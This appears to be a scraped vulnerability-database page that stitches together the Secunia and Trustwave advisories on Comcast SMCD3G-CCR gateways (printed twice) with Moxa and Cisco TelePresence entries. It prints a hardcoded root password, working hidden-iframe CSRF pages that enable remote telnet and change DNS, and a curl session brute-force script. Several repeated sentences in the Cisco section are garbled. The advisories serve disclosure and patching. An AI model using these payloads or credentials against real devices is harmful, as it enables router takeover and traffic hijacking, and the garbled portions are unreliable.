https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0083 | CVE-2011-0885 | SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0386 | No CVE | Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition
| VAR-201102-0225 | CVE-2011-0385 | Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary files on the webserver.
This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence
Recording Server. The defect
that is related to each component is covered in each associated
advisory. The defect
that is related to each component is covered in each associated
advisory. The defect that is related to each component is
covered in each associated advisory. The defect that
is related to each component is covered in each associated advisory.
All releases of Cisco TelePresence software prior to 1.7.1 are
affected by one or more of the vulnerabilities listed in this
advisory.
To determine the current version of software that is running on the
Cisco TelePresence Recording Server, SSH into the device and issue the
show version active and the show version inactive commands. The
output should resemble the following example:
admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
In the preceding example, the system has versions 1.6.2 and 1.7.0
loaded on the device and version 1.7.0 is currently active. A device
is affected only by vulnerabilities that are present in the active
software version.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The Cisco TelePresence solution allows for immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners even when they are located in opposite
hemispheres. These vulnerabilities are
independent of each other.
Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users.
* Cisco TelePresence Recording Server - CSCtf42005 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
* Cisco TelePresence Recording Server - CSCtf97221 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0382.
* Cisco TelePresence Recording Server - CSCth85786 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0385. This vulnerability could be leveraged to obtain full
control of the affected device.
* Cisco TelePresence Recording Server - CSCti50739 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0386. This vulnerability could allow
an unauthenticated, adjacent attacker to trigger a buffer overflow
condition.
Because Cisco Discovery Protocol works at the data-link layer (Layer
2), an attacker must have a way to submit an Ethernet frame directly
to an affected device. This may be possible in situations where the
affected system is part of a bridged network or connected to a
nonpartitioned device such as a network hub.
* Cisco TelePresence Recording Server - CSCtd75769 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0379.
Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices. A restart of the affected
device may be required to regain functionality.
* Cisco TelePresence Recording Server - CSCtf97205 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0391.
Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices due to a failure to properly restrict access
to the RMI interface of the Java Servlet framework. An
unauthenticated, remote attacker could trigger an out-of-memory
condition on the Servlet host by issuing a series of crafted
requests.
* Cisco TelePresence Recording Server - CSCtg35830 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0388. This vulnerability could allow an
unauthenticated, remote attacker to perform a limited number of
actions on the system that should be restricted to authorized users.
* Cisco TelePresence Recording Server - CSCtg35833 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0392.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Cisco Security Advisory is done in accordance with
CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCtf42005 - Unauthenticated Java Servlet Access
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97221 - CGI Command Injection
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCth85786 - Unauthenticated Arbitrary File Upload
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCti50739 - XML-RPC Arbitrary File Overwrite
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
CVSS Base Score - 7.9
Access Vector - Adjacent Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 6.5
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97205 - Ad Hoc Recording Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35830 - Java RMI Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35833 - Unauthenticated XML-RPC Interface
CVSS Base Score - 7.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the
affected device. In some instances
this issue could be leveraged to gain complete control of the
affected system.
Successful exploitation of the Cisco Discovery Protocol Remote Code
Execution (CSCtd75769) vulnerability could allow an unauthenticated,
adjacent attacker to take complete control of the affected system.
Successful exploitation of the Ad Hoc Recording Denial of Service
(CSCtf97205) vulnerability could allow an unauthenticated, remote
attacker to cause a persistent denial of service condition on an
affected device.
Successful exploitation of the Java RMI Denial of Service
(CSCtg35830) vulnerability could allow an unauthenticated, remote
attacker to cause all web-based services to become inaccessible.
Successful exploitation of the Unauthenticated XML-RPC Interface
(CSCtg35833) vulnerability could allow an unauthenticated, remote
attacker to perform a number of actions that should be restricted to
authenticated users.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following Cisco TelePresence System Software table
defines a specific defect, the first fixed release, and the
recommended release to resolve all the security issues identified in
this advisory as well as other non-security-related issues. Cisco
recommends upgrading to a release equal to or later than the release
in the Recommended Release column of the table.
Workarounds
===========
There are no device- or system-based workarounds for the identified
vulnerabilities.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
